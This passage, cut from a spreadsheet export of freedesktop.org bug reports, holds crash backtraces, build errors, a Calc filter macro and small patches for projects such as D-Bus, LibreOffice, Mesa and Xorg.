==26952==    at 0x42F1B12: _tp_account_check_features (account.c:228)
==26952==    by 0x42F21D0: _tp_account_update (account.c:307)
==26952==    by 0x43736A8: _tp_cli_dbus_properties_invoke_callback_get_all (tp-cli-generic-body.h:1421)
==26952==    by 0x4375E66: tp_proxy_pending_call_idle_invoke (proxy-methods.c:153)
==26952==    by 0x5C330B0: g_idle_dispatch (gmain.c:4065)
==26952==    by 0x5C34E97: g_main_context_dispatch (gmain.c:1960)
==26952==    by 0x5C38622: g_main_context_iterate (gmain.c:2591)
==26952==    by 0x5C38AE9: g_main_loop_run (gmain.c:2799)
==26952==    by 0x55D1ED8: gtk_main (gtkmain.c:1216)
==26952==    by 0x8066D36: main (empathy.c:1002)</t>
  </si>
  <si>
    <t>DBUS-71818</t>
  </si>
  <si>
    <t>do not install systemd unit files if systemd disabled</t>
  </si>
  <si>
    <t>I found that 'make install' will install dbus systemd unit files regardless if configured with '--disable-systemd'.
I think this is a bug. If compiled without systemd the units shouldn't be installed.</t>
  </si>
  <si>
    <t>PKG-CONFIG-53493</t>
  </si>
  <si>
    <t>Compile errors on OmniOS</t>
  </si>
  <si>
    <t>Created attachment 65547
config.log
OS : SunOS testvm 5.11 omnios-eae537b i86pc i386 i86pc Solaris
GCC Version : 4.6.3
pkg-config Version : 0.27
Configure Options : --with-internal-glib --prefix=/usr --docdir=/usr/share/doc/pkg-config-0.27
Got an error when I compile with internal glib :
  CC     gdataset.lo
In file included from gdataset.c:47:0:
glib_trace.h:33:25: fatal error: glib_probes.h: No such file or directory
compilation terminated.
make[6]: *** [gdataset.lo] Error 1
make[6]: Leaving directory `/root/pkg-config-0.27/glib/glib'
make[5]: *** [all-recursive] Error 1
make[5]: Leaving directory `/root/pkg-config-0.27/glib/glib'
make[4]: *** [all] Error 2
make[4]: Leaving directory `/root/pkg-config-0.27/glib/glib'
make[3]: *** [all-recursive] Error 1
make[3]: Leaving directory `/root/pkg-config-0.27/glib'
make[2]: *** [all] Error 2
make[2]: Leaving directory `/root/pkg-config-0.27/glib'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/root/pkg-config-0.27'
make: *** [all] Error 2
Many thanks for any hints!</t>
  </si>
  <si>
    <t>LIBREOFFICE-44392</t>
  </si>
  <si>
    <t>EDITING: in docx document amount of pages differs from Word</t>
  </si>
  <si>
    <t>Created attachment 55054
.docx file that reproduce the error.
Problem description: segmentation fault when deleting objects in a  specific .docx file (file attached)
Steps to reproduce:
1. open the .docx file attached.
2. set the cursor position at the first line.
3. hit the delete button sometimes in your keyboard to delete document objects (images) and text.
Current behavior: segmentation fault. gdb backtrace: http://pastebin.com/tpYCUb1G
Expected behavior: delete all objects and text in the file one by one. 
Platform: Debian Wheezy Linux 3.1.0-1-amd64 #1 SMP Sun Dec 11 20:36:41 UTC 2011 x86_64 GNU/Linux
          also tested in a virtualized windows 7 (hosted in the above Debian machine using Virtualbox) running LibreOffice  3.4.4
Browser: Mozilla/5.0 (X11 Linux x86_64 rv:8.0) Gecko/20100101 Firefox/8.0 Iceweasel/8.0</t>
  </si>
  <si>
    <t>slashytu</t>
  </si>
  <si>
    <t>DRI-96214</t>
  </si>
  <si>
    <t>[BAT SKL] WARN Unclaimed register detected (0x65f10) / gem_exec_suspend@basic-s4</t>
  </si>
  <si>
    <t>[  467.894482] [drm] GuC firmware load skipped
[  467.895388] ------------[ cut here ]------------
[  467.895417] WARNING: CPU: 0 PID: 7882 at drivers/gpu/drm/i915/intel_uncore.c:803 __unclaimed_reg_debug+0x63/0x70 [i915]
[  467.895418] Unclaimed register detected after reading register 0x65f10
[  467.895430] Modules linked in: snd_hda_intel i915 drm_kms_helper drm snd_hda_codec_hdmi snd_hda_codec_conexant snd_hda_codec_generic snd_hda_codec intel_rapl snd_hda_core xhci_pci xhci_hcd tpm_crb x86_pkg_temp_thermal intel_powerclamp i2c_hid tpm_tis tpm rtsx_pci usbcore coretemp hid snd_hwdep ghash_clmulni_intel mfd_core evdev joydev mei_me serio_raw mei snd_pcm snd_timer processor video usb_common i2c_algo_bit battery button acpi_pad ac wmi netconsole psmouse r8169 mii [last unloaded: drm]
[  467.895432] CPU: 0 PID: 7882 Comm: kworker/u16:29 Tainted: G     U          4.6.0+ #3
[  467.895432] Hardware name: TOSHIBA SATELLITE P50-C/06F4                             BIOS 1.20 10/08/2015
[  467.895435] Workqueue: events_unbound async_run_entry_fn
[  467.895437]  0000000000000086 0000000076c67ed2 ffffffff814c4ec5 ffff880233b9fc50
[  467.895438]  0000000000000000 ffffffff810f8f0e 0000000000065f10 ffff880233b9fca8
[  467.895439]  0000000000000001 0000000000000001 0000000000000000 ffff880067610000
[  467.895439] Call Trace:
[  467.895443]  [] ? dump_stack+0x5c/0x77
[  467.895444]  [] ? __warn+0xbe/0xe0
[  467.895445]  [] ? warn_slowpath_fmt+0x5f/0x80
[  467.895459]  [] ? __unclaimed_reg_debug+0x63/0x70 [i915]
[  467.895472]  [] ? gen9_read32+0x346/0x380 [i915]
[  467.895474]  [] ? pci_pm_suspend_noirq+0x170/0x170
[  467.895487]  [] ? i915_audio_component_codec_wake_override+0x33/0xa0 [i915]
[  467.895493]  [] ? snd_hdac_set_codec_wakeup+0x39/0x90 [snd_hda_core]
[  467.895495]  [] ? hda_intel_init_chip+0x12a/0x180 [snd_hda_intel]
[  467.895497]  [] ? azx_resume+0x94/0x160 [snd_hda_intel]
[  467.895499]  [] ? dpm_run_callback+0x48/0x120
[  467.895500]  [] ? device_resume+0x82/0x190
[  467.895501]  [] ? async_resume+0x19/0x40
[  467.895502]  [] ? async_run_entry_fn+0x45/0x130
[  467.895503]  [] ? process_one_work+0x15d/0x410
[  467.895504]  [] ? worker_thread+0x4d/0x480
[  467.895505]  [] ? process_one_work+0x410/0x410
[  467.895507]  [] ? kthread+0xcd/0xf0
[  467.895509]  [] ? ret_from_fork+0x22/0x40
[  467.895510]  [] ? kthread_create_on_node+0x190/0x190
[  467.895511] ---[ end trace 9fd67d7ca6273eba ]---
Can be reproduced each time by running:
$ tests/gem_exec_suspend --run-subtest basic-S4
Happens after the machine returns from suspend. Assigned to Takashi as it seems to originate in snd.</t>
  </si>
  <si>
    <t>marius.c.vlad</t>
  </si>
  <si>
    <t>LIBREOFFICE-41568</t>
  </si>
  <si>
    <t>BUGZILLAASSISTANT: user-friendly bug submission: gracefully handle bad gateway</t>
  </si>
  <si>
    <t>Created attachment 52092
Screenshot of a 502 Bad Gateway error message.
Since it's apparently not /that/ uncommon of an occurrence the user-friendly bug reporter might consider handling more gracefully the issue of a bad gateway.
While submitting a first couple of trial bug reports on this form about 15 minutes ago I encountered an error after submitting.  In a red box at top was this error message:
could not match title&gt;Bug ([0-9]+) on the string returned by the server  502 Bad Gateway  Bad Gateway The proxy server received an invalid response from an upstream server.  Additionally a 400 Bad Request error was encountered while trying to use an ErrorDocument to handle the request. 
For a plus point I note that my text was not lost as often happens with web forms.
Please find attached a screenshot of the 502 Bad Gateway result.</t>
  </si>
  <si>
    <t>LIBREOFFICE-50871</t>
  </si>
  <si>
    <t>BUGZILLAASSISTANT: Help Linguistic only available for mouseover Picker not for mouseover Icon</t>
  </si>
  <si>
    <t>Steps how to reproduce:
1. Go to a.m. URL
2. Hover picker Select component - Linguistic with mouse pointer
   &gt; As expected help appears
3. Select WWW in Components Picker
4. Move mouse pointer hovering all icons
   Expected: Help appears for each activated icon when mouseover
   Actual: Component Help pane empty no Help
Linguistic Icon is in second row most right one</t>
  </si>
  <si>
    <t>TELEPATHY-27855</t>
  </si>
  <si>
    <t>TpChannelManager should leave TargetID in the request dict (or even add it if missing?)</t>
  </si>
  <si>
    <t>11:55  i made TpChannelManager normalize from id to handle
...
12:03  wjt: didn't we decide that for requesting phone numbers with 
              trailing DTMF TpChannelManager should pass the un-normalized ID 
              through as well?
...
12:04  generally we should propogate unmolested ids as much as 
                  possible
12:04  right
12:04  currently we guarantee to remove the ID from the dict entirely
12:04  so passing it through after all shouldn't break anyone
This would also be useful to fix Gabble Bug #22456 and Bug #25143 but is not sufficient:
12:06  smcv: right but that's not the problem
12:06  smcv: the handle normalization function thorws an erorr
12:06  because foo isn't a valid conference JID if you don't have a 
             conf server
12:07  yeah
12:07  perhaps have a flag TpChannelManagers can set for it's ok I 
              don't need my handles normalized?
(If we want such a flag we should probably add it at the same time.)
The DTMF use-case is Bug #24902.</t>
  </si>
  <si>
    <t>XORG-47462</t>
  </si>
  <si>
    <t>xwd should check for libXt libxkbfile in configure.ac</t>
  </si>
  <si>
    <t>i686-pc-linux-gnu-gcc -std=gnu99 -DHAVE_CONFIG_H -I. -I/var/tmp/portage/x11-apps/xwd-1.0.5/work/xwd-1.0.5    -Wall -Wpointer-arith -Wstrict-prototypes -Wmissing-prototypes -Wmissing-declarations -Wnested-externs -Wbad-function-cast -Wformat=2 -Wold-style-definition -Wdeclaration-after-statement -Wunused -Wuninitialized -Wshadow -Wcast-qual -Wmissing-noreturn -Wmissing-format-attribute -Wredundant-decls -Werror=implicit -Werror=nonnull -Werror=init-self -Werror=main -Werror=missing-braces -Werror=sequence-point -Werror=return-type -Werror=trigraphs -Werror=array-bounds -Werror=write-strings -Werror=address -Werror=int-to-pointer-cast -Werror=pointer-to-int-cast -fno-strict-aliasing  -Os -march=pentium4 -pipe -fomit-frame-pointer -c /var/tmp/portage/x11-apps/xwd-1.0.5/work/xwd-1.0.5/xwd.c
/var/tmp/portage/x11-apps/xwd-1.0.5/work/xwd-1.0.5/multiVis.c:41:27: fatal error: X11/Intrinsic.h: No such file or directory
compilation terminated.
make[2]: *** [multiVis.o] Error 1
Intrinsic.h is part of libXt its presence should be checked by configure.</t>
  </si>
  <si>
    <t>LIBQMI-96854</t>
  </si>
  <si>
    <t>Multiple common-refs doesn't work in data/json files</t>
  </si>
  <si>
    <t>Created attachment 124952
Fix using many common-refs in messages
If I use more than one common-ref in message definition code generator replaces it incorrectly. Compilation error raised. 
The patch fixes it.</t>
  </si>
  <si>
    <t>DBUS-8546</t>
  </si>
  <si>
    <t>Dbus crash on startup</t>
  </si>
  <si>
    <t>This has been reported in http://bugzilla.gnome.org/show_bug.cgi?id=357564
Epiphany was started as soon as the GNOME session started (manually not from a
saved session) and it crashed.
Original trace:
Distribution: Ubuntu 6.10 (edgy)
Gnome Release: 2.16.0 2006-09-04 (Ubuntu)
BugBuddy Version: 2.16.0
Memory status: size: 61980672 vsize: 0 resident: 61980672 share: 0 rss:
27340800 rss_rlim: 0
CPU usage: start_time: 1159168250 rtime: 0 utime: 154 stime: 0 cutime:138
cstime: 0 timeout: 16 it_real_value: 0 frequency: 0
Backtrace was generated from '/usr/bin/epiphany'
(no debugging symbols found)
Using host libthread_db library /lib/tls/i686/cmov/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1228220752 (LWP 4433)]
[New Thread -1250206816 (LWP 4445)]
0xffffe410 in __kernel_vsyscall ()
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb7e6d69b in __waitpid_nocancel () from /lib/tls/i686/cmov/libc.so.6
#2  0xb7d461b6 in libgnomeui_segv_handle (signum=6) at gnome-ui-init.c:874
#3  0xb7f73230 in gtk_moz_embed_get_title ()
   from /usr/lib/firefox/libgtkembedmoz.so
#4  
#5  0xffffe410 in __kernel_vsyscall ()
#6  0xb7e08760 in *__GI_raise () from /lib/tls/i686/cmov/libc.so.6
#7  0xb7e09ee3 in *__GI_abort () from /lib/tls/i686/cmov/libc.so.6
#8  0xb6f5a1a2 in IA__g_logv (log_domain= 
    log_level=G_LOG_LEVEL_ERROR 
    format=0xb6f84920 file %s: line %d (%s): assertion failed: (%s) 
    args1=0xbf8ecddc ^Ã EÂ·\222\002) at gmessages.c:497
#9  0xb6f5a1d9 in IA__g_log (log_domain=0x0 log_level=G_LOG_LEVEL_ERROR 
    format=0xb6f84920 file %s: line %d (%s): assertion failed: (%s))
    at gmessages.c:517
#10 0xb6f5a256 in IA__g_assert_warning (log_domain=0x0 
    file=0xb745e05e dbus-gproxy.c line=658 
    pretty_function=0xb745ee0e unassociate_proxies 
    expression=0xb745e1d1 priv-&gt;associated) at gmessages.c:552
#11 0xb7454c21 in dbus_g_proxy_new_for_name ()
   from /usr/lib/libdbus-glib-1.so.2
#12 0xb6f448c6 in IA__g_hash_table_foreach (hash_table=0x852b760 
    func=0xb7454b00  user_data=0xbf8ecee4)
    at ghash.c:662
#13 0xb7456b28 in dbus_g_proxy_set_interface ()
   from /usr/lib/libdbus-glib-1.so.2
#14 0xb73148ce in dbus_connection_dispatch () from /usr/lib/libdbus-1.so.3
#15 0xb744e51d in dbus_server_setup_with_g_main ()
   from /usr/lib/libdbus-glib-1.so.2
#16 0xb6f51872 in IA__g_main_context_dispatch (context=0x818a4c0)
    at gmain.c:2045
#17 0xb6f5484f in g_main_context_iterate (context=0x818a4c0 block=1 
    dispatch=1 self=0x8167ee0) at gmain.c:2677
#18 0xb6f54bf9 in IA__g_main_loop_run (loop=0x81cb6a0) at gmain.c:2881
#19 0xb79d4464 in IA__gtk_main () at gtkmain.c:1024
#20 0x08077257 in main ()
Thread 2 (Thread -1250206816 (LWP 4445)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb7ea27c3 in *__GI___poll () from /lib/tls/i686/cmov/libc.so.6
No locals.
#2  0xb7f35eb9 in PR_Poll () from /usr/lib/libnspr4.so
No symbol table info available.
#3  0xb667348b in NSGetModule () from /usr/lib/firefox/components/libnecko.so
No symbol table info available.
#4  0xb6673cc2 in NSGetModule () from /usr/lib/firefox/components/libnecko.so
No symbol table info available.
#5  0xb6ee574b in nsIThread::SetMainThread ()
   from /usr/lib/firefox/libxpcom_core.so
No symbol table info available.
#6  0xb7f3a11d in PR_JoinThread () from /usr/lib/libnspr4.so
No symbol table info available.
#7  0xb7000504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#8  0xb7eac4de in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 1 (Thread -1228220752 (LWP 4433)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb7e6d69b in __waitpid_nocancel () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb7d461b6 in libgnomeui_segv_handle (signum=6) at gnome-ui-init.c:874
        estatus = 6
        sa = {__sigaction_handler = {sa_handler = 0 sa_sigaction = 0} 
  sa_mask = {__val = {3069385001 3086280536 3069385142 3084803432 911 
      3084824344 3086280608 3086561268 3086452968 3086365480 3213804544 
      3086506306 3086453392 3066758024 3086024692 3086029088 139415984 
      3213804568 3085195812 3086029088 139415984 3084824344 3086440744 
      139420320 6 3213804600 3086527808 3086440744 3086440744 
      139420320 6 3213804600}} sa_flags = -1208537271 
  sa_restorer = 0x84f51b0}
        pid = 0
        in_segv = 1
#3  0xb7f73230 in gtk_moz_embed_get_title ()
   from /usr/lib/firefox/libgtkembedmoz.so
No symbol table info available.
#4  
No symbol table info available.
#5  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#6  0xb7e08760 in *__GI_raise () from /lib/tls/i686/cmov/libc.so.6
No locals.
#7  0xb7e09ee3 in *__GI_abort () from /lib/tls/i686/cmov/libc.so.6
No locals.
#8  0xb6f5a1a2 in IA__g_logv (log_domain= 
    log_level=G_LOG_LEVEL_ERROR 
    format=0xb6f84920 file %s: line %d (%s): assertion failed: (%s) 
    args1=0xbf8ecddc ^Ã EÂ·\222\002) at gmessages.c:497
        depth = 
        domain = (GLogDomain *) 0x81602d0
        data = (gpointer) 0x0
        log_func = (GLogFunc) 0x81073c0 
        domain_fatal_mask = 5
        test_level = 
        was_recursion = 0
        i = 
#9  0xb6f5a1d9 in IA__g_log (log_domain=0x0 log_level=G_LOG_LEVEL_ERROR 
    format=0xb6f84920 file %s: line %d (%s): assertion failed: (%s))
    at gmessages.c:517
        args = 0xbf8ecddc ^Ã EÂ·\222\002
#10 0xb6f5a256 in IA__g_assert_warning (log_domain=0x0 
    file=0xb745e05e dbus-gproxy.c line=658 
    pretty_function=0xb745ee0e unassociate_proxies 
    expression=0xb745e1d1 priv-&gt;associated) at gmessages.c:552
No locals.
#11 0xb7454c21 in dbus_g_proxy_new_for_name ()
   from /usr/lib/libdbus-glib-1.so.2
No symbol table info available.
#12 0xb6f448c6 in IA__g_hash_table_foreach (hash_table=0x852b760 
    func=0xb7454b00  user_data=0xbf8ecee4)
    at ghash.c:662
        node = (GHashNode *) 0x852ca98
        i = 139643528
        __PRETTY_FUNCTION__ = IA__g_hash_table_foreach
#13 0xb7456b28 in dbus_g_proxy_set_interface ()
   from /usr/lib/libdbus-glib-1.so.2
No symbol table info available.
#14 0xb73148ce in dbus_connection_dispatch () from /usr/lib/libdbus-1.so.3
No symbol table info available.
#15 0xb744e51d in dbus_server_setup_with_g_main ()
   from /usr/lib/libdbus-glib-1.so.2
No symbol table info available.
#16 0xb6f51872 in IA__g_main_context_dispatch (context=0x818a4c0)
    at gmain.c:2045
No locals.
#17 0xb6f5484f in g_main_context_iterate (context=0x818a4c0 block=1 
    dispatch=1 self=0x8167ee0) at gmain.c:2677
        got_ownership = 
        max_priority = 0
        timeout = 0
        some_ready = 1
        nfds = 
        allocated_nfds = 
        fds = (GPollFD *) 0x86abcb8
        __PRETTY_FUNCTION__ = g_main_context_iterate
#18 0xb6f54bf9 in IA__g_main_loop_run (loop=0x81cb6a0) at gmain.c:2881
        got_ownership = -1209300096
        self = (GThread *) 0x8167ee0
        __PRETTY_FUNCTION__ = IA__g_main_loop_run
#19 0xb79d4464 in IA__gtk_main () at gtkmain.c:1024
        tmp_list = (GList *) 0x0
        functions = (GList *) 0x0
        init = (GtkInitFunction *) 0x0
        loop = (GMainLoop *) 0x81cb6a0
#20 0x08077257 in main ()
No symbol table info available.
#0  0xffffe410 in __kernel_vsyscall ()</t>
  </si>
  <si>
    <t>LIBREOFFICE-46983</t>
  </si>
  <si>
    <t>Macros: Macro to set filter in Calc does not work with .StringValue</t>
  </si>
  <si>
    <t>Created attachment 58042
calc example
Problem description: 
Steps to reproduce:
1. Download file attached and start macro 'filter'
OR
1. Open Calc and fill in cells A2:'1' A3:'libre'
2. Open Basic IDE insert and start the following macro:
Sub Filter
 Dim oFilterDef as Object        'Filterdescriptor
 Dim oFilterfield as Object      'Filterkriterium
 Dim oArea as Object             'Filterarea
 oFilterfield = createUnoStruct(com.sun.star.sheet.TableFilterField)
 With oFilterfield
  .Field = 0
  .IsNumeric = False
  .Operator = com.sun.star.sheet.FilterOperator.EQUAL
  .NumericValue = 1
  .StringValue = libre
 end with
 oArea = ThisComponent.Sheets.getbyIndex(0).getCellRangebyPosition(0 0 3 6) 
 oFilterDef = oArea.createFilterDescriptor(True)
 With oFilterDef
  .setFilterFields(Array(oFilterfield))
  .ContainsHeader = True
  .UseRegularExpressions = False
  .IsCaseSensitive = False
 end with
 oArea.Filter(oFilterDef)
end sub
Current behavior:
Macro filters the given .NumericValue (in the example it is set to '1' just for demonstration)
Expected behavior:
Macro should filter the .StringValue 'libre'. That works fine with LO 3.4 but not in version 3.5 (German). 
Struct com.sun.star.sheet.TableFilterField2 and com.sun.star.sheet.TableFilterField3 behave in the same way.
Platform (if different from the browser): 
tested on WindowsXP and Ubuntu 11.10
Browser: Opera/9.80 (Windows NT 5.1 U de) Presto/2.10.229 Version/11.61</t>
  </si>
  <si>
    <t>tabe</t>
  </si>
  <si>
    <t>folke7</t>
  </si>
  <si>
    <t>MESA-19360</t>
  </si>
  <si>
    <t>[G45] Shaders looking funky in Sauerbraten</t>
  </si>
  <si>
    <t>Created attachment 21618
gl mode - broken
Shaders in the game Sauerbraten does not work correctly it gives a quite funky effect to say the least.
I'm attaching a screenshot of the problem and another one taken in software mode where everything seems to work ok.
The game gives these errors when shaders are activated but I guess they're harmless as they appear in software mode too:
 Rendering using the OpenGL 1.5 GLSL shader path.
 GLSL ERROR (VS:glsltest)
 Error: 
 Error: failed to preprocess the source.
 GLSL ERROR (PS:glsltest)
 Error: 
 Error: failed to preprocess the source.
This problem is present at least as far back as Mesa 7.2.
System environment:
-- chipset: G45 / ICH10R
-- system architecture: 32-bit
-- Linux distribution: Debian unstable
-- Machine or mobo model: Asus P5Q-EM
-- Display connector: DVI
-- xf86-video-intel: d8e89b26ef5ef2c15e5d34162b14d279a7f0bb1c
-- xserver: 1.5.2
-- mesa: bfebeffc0045266d354a36968336337e099a9f27
-- drm: 0243c9f801a35de3465a0321c02f18a4d07ce5b8
-- kernel: drm-intel-2.6.28 72e2bfb03f46f7eef1ae8907593dd35e2c5603de</t>
  </si>
  <si>
    <t>LIBREOFFICE-66682</t>
  </si>
  <si>
    <t>RTF: RTF bullets and numbering - bad export</t>
  </si>
  <si>
    <t>Created attachment 82166
test documents
As you see the test docs when making a numbered and sub numbered list in LibreOffice 4 and use ODT format it is OK. But when we exporting to RTF format I loose my subnumbers.
It is easy to reproduce: you make a list which is contain 5-7 elements and some sub elements.
Thank you!
Operating System: Windows 7
Version: 4.0.4.2 release</t>
  </si>
  <si>
    <t>penzes_david</t>
  </si>
  <si>
    <t>DESKTOP-FILE-UTILS-108232</t>
  </si>
  <si>
    <t>kjk</t>
  </si>
  <si>
    <t>kk</t>
  </si>
  <si>
    <t>dipalipsonawane</t>
  </si>
  <si>
    <t>XORG-4990</t>
  </si>
  <si>
    <t>Fix for VIA modeswitching crash</t>
  </si>
  <si>
    <t>When switching video modes (Ctrl+/Ctrl-) using the VIA driver with DRI disabled
 my screen goes black and the system is locked up completely.
This is due to a problem in xfree86/drivers/via/via_driver.c line 2295 (current
CVS). The function VIASwitchMode does an unconditional call to kickVblank()
while kickVblank will crash the server when not in DRI mode.
I solved this problem on my system by moving the call to kickVblank one line
down so that it is only called when directRenderingEnabled is true.</t>
  </si>
  <si>
    <t>jvrantwijk</t>
  </si>
  <si>
    <t>XORG-4999</t>
  </si>
  <si>
    <t>Freeze while on MacMini possible related to sound usage.</t>
  </si>
  <si>
    <t>(Note: This was reported to RH bugzilla. I was asked to report it here also. 
The xorg version provided by Red Hat is 6.8.2 based but I am not sure exactly
what has been patched.)
If I install any version (tried previous versions of xorg-x11 from the
development version) of xorg-x11 from FC-devel then I experience random
freezes/crashes on my MacMini.
Since I am in X I do not know what happened. There is nothing in the logs after
the freeze has happened.
I am not entirely sure which version the Fedora Core-devel version matches in
the plain xorg-x11.
It seems slightly related to the sound system but not entirely sure.
I use XFCE 4 (development version) and XFmedia.
I can use the new development version of as long as I do not try to listen to
music or sometimes even start the xfmedia application. Either I can listen to
music for a while (in X) and then a freeze occurs or the freeze happens as soon
as I open the xfmedia application.
I do not use the stock Red Hat kernel since this does not include power
management to control the fan (atleast it did not in earlier versions making the
fan run at full speed all times). I have experience these issues with kernels
2.6.12.5 2.6.13.1 and 2.6.14.
Also if I enable DRI in the xorg-x11 config file I can not use X at all. The
graphics do not seem so sync with the monitor correctly (the graphics is
severely corrupted - it looks like one single pixel line is compressed into only
a few pixels).
As included in the xorg-x11 config file below I also had to enable UseFBDev to
get any useful graphical output (atleast with the standard FC4 xorg-x11 releases).
Version-Release number of selected component (if applicable):
xorg-x11-6.8.2-58.ppc
How reproducible:
Always
Steps to Reproduce:
1. Start X
2. Start xfmedia
3. Use computer in X and after a non-deterministic time a freeze will happen.
Actual Results:  The following operation causes freezes at random times.
Expected Results:  No freeze.
Additional info:
Every version I tried in the development version of X11 causes freezes.</t>
  </si>
  <si>
    <t>john.eckerdal</t>
  </si>
  <si>
    <t>PKG-CONFIG-29056</t>
  </si>
  <si>
    <t>pkg-config-0.25 get error with autoconf-2.66 by autoconf --force option</t>
  </si>
  <si>
    <t>macro PKG_CHECK_MODULES in pkg.m4 get error with autoconf-2.66 autoreconf --force option (autoconf --force too).
in configure.ac write
PKG_CHECK_MODULES(GLIB [glib-2.0])
and autoreconf with -f (--force) option
configure:3445: error: possibly undefined macro: AS_MESSAGE_LOG_FDdnl
       If this token and others are legitimate please use m4_pattern_allow.
       See the Autoconf documentation.
$ cat -n configure | head -n 3450 - | tail -n 10 -
3441	installed software in a non-standard prefix.
3442	
3443	Alternatively you may set the environment variables GLIB_CFLAGS
3444	and GLIB_LIBS to avoid the need to call pkg-config.
3445	See the pkg-config man page for more details. $LINENO AS_MESSAGE_LOG_FDdnl
3446	
3447	elif test $pkg_failed = untried then
3448	     	{ $as_echo $as_me:${as_lineno-$LINENO}: result: no &gt;&amp;5
3449	$as_echo no &gt; }
3450		{ { $as_echo $as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd': &gt;&amp;5
to fix this probrem i create patch below but i don't think it is good patch.
--- pkg.m4.old	2010-07-14 00:06:09.000000000 +0900
+++ pkg.m4	2010-07-14 00:06:28.000000000 +0900
@@ -1357 +1357 @@
 Consider adjusting the PKG_CONFIG_PATH environment variable if you
 installed software in a non-standard prefix.
-_PKG_TEXT])dnl
+_PKG_TEXT])[]dnl
         ])
 elif test $pkg_failed = untried then
      	AC_MSG_RESULT([no])</t>
  </si>
  <si>
    <t>fut_nis</t>
  </si>
  <si>
    <t>WAYLAND-105620</t>
  </si>
  <si>
    <t>wayland 1.14.92 symbols check fails on armv7hl and aarch64</t>
  </si>
  <si>
    <t>From Fedora 28 package build log:
=======================================
   wayland 1.14.92: ./test-suite.log
=======================================
# TOTAL: 24
# PASS:  23
# SKIP:  0
# XFAIL: 0
# FAIL:  1
# XPASS: 0
# ERROR: 0
.. contents:: :depth: 2
FAIL: egl/wayland-egl-symbols-check
===================================
New ABI detected - If intentional update the test.
__bss_end__
__bss_start__
__end__
_bss_end__
FAIL egl/wayland-egl-symbols-check (exit status: 1)
Full build logs down below (short lived links):
https://kojipkgs.fedoraproject.org//work/tasks/3268/25833268/build.log (armv7hl)
https://kojipkgs.fedoraproject.org//work/tasks/3264/25833264/build.log (aarch64)</t>
  </si>
  <si>
    <t>FONTCONFIG-73686</t>
  </si>
  <si>
    <t>confdir is not set correctly in fontconfig.pc</t>
  </si>
  <si>
    <t>$ cat /usr/lib/pkgconfig/fontconfig.pc
prefix=/usr
exec_prefix=${prefix}
libdir=/usr/lib
includedir=${prefix}/include
sysconfdir=/etc
localstatedir=/var
PACKAGE=fontconfig
confdir=@baseconfigdir@
cachedir=${localstatedir}/cache/${PACKAGE}
Name: Fontconfig
Description: Font configuration and customization library
Version: 2.11.0
Requires:  freetype2
Requires.private:  expat
Libs: -L${libdir} -lfontconfig
Libs.private: -lexpat  -lfreetype
Cflags: -I${includedir}  -I/usr/include/freetype2 -I/usr/include/libpng16
@baseconfigdir@ is not expanded since it is set in Makefile.am while fontconfig.pc is generated from configure.ac. The correct value should be @BASECONFIGDIR@ which is known in configure.ac.
I have attached a one line patch which fixes this.</t>
  </si>
  <si>
    <t>vikraman.choudhury</t>
  </si>
  <si>
    <t>LIBREOFFICE-42465</t>
  </si>
  <si>
    <t>FILEOPEN RTF: import-export error after change font</t>
  </si>
  <si>
    <t>Created attachment 52988
rtf document writed in Hungarian
I attach an example file writed in hungarian. I opened the file and change the font in ubuntu linux 11.10 to Ubuntu and in Windows XP sp3 to Times New Roman and save the file. After I reopened it the hungarian specific characters changed to unreadable characters both in windows and linux.</t>
  </si>
  <si>
    <t>nagy.akos</t>
  </si>
  <si>
    <t>DRI-50238</t>
  </si>
  <si>
    <t>[ILK SNB IVB VLV] need to make sure FBC is disabled when primary is disabled</t>
  </si>
  <si>
    <t>Need to make sure the sprite plane optimization disables fbc.
http://dt.igk.intel.com/wa_database/DetailsView/Show?wa_name_id=1004</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-9420</t>
  </si>
  <si>
    <t>Please create account for me</t>
  </si>
  <si>
    <t>Please create account for me to commit to GIT.</t>
  </si>
  <si>
    <t>slapinid</t>
  </si>
  <si>
    <t>GEOCLUE-89922</t>
  </si>
  <si>
    <t>locator: bug in accuracy and distance comparison</t>
  </si>
  <si>
    <t>I noticed a bug in the comparison between the distance between the current and the previous location and the accuracy of the current location used to discard the new location. The accuracy is given in meters and the distance is returned in kilometers.</t>
  </si>
  <si>
    <t>LIBREOFFICE-87237</t>
  </si>
  <si>
    <t>matrix comparisons do not propagate error values</t>
  </si>
  <si>
    <t>Created attachment 110739
matrix comparison loses error values test case document
During matrix comparisons error values are lost and converted to boolean values. See attached test case. Cells B3 and C3 should result in a #DIV/0! error.</t>
  </si>
  <si>
    <t>GEOCLUE-96521</t>
  </si>
  <si>
    <t>Fix gtk-doc build when builddir != srcdir</t>
  </si>
  <si>
    <t>Please see the attached patch. It fixes gtk-doc build problems when building in non-srcdir.</t>
  </si>
  <si>
    <t>LIBREOFFICE-74412</t>
  </si>
  <si>
    <t>EDITING: Bezier curve pasted as GDI metafile is spoiled</t>
  </si>
  <si>
    <t>Created attachment 93250
Original Bezier.odg and Writer result Bezier.odt
Problem description: 
Steps to reproduce:
1. Draw: Create a bezier curve with an arrow tip and copy it to the clipboard
2. Writer: Paste the bezier curve as a GDI metafile into the Writer document
Current behavior:
The arrow tip is torn off the bezier curve and placed with some offset of the rest of the bezier curve
Expected behavior:
A true placement of the bezier curve together with its arrow tip
Operating System: openSUSE
Version: 4.1.4.2 release</t>
  </si>
  <si>
    <t>Tom583</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-37725</t>
  </si>
  <si>
    <t>Blog addition to planet</t>
  </si>
  <si>
    <t>Please add my blog to http://planet.freedesktop.org
 --&gt; http://gsoc2011xorg.wordpress.com/</t>
  </si>
  <si>
    <t>vikashagrawal1990</t>
  </si>
  <si>
    <t>PULSEAUDIO-104227</t>
  </si>
  <si>
    <t>Typo in translatable string</t>
  </si>
  <si>
    <t>Hi
in the file src/pavucontrol.cc of Pavucontrol is the string This situation can also arrise ...
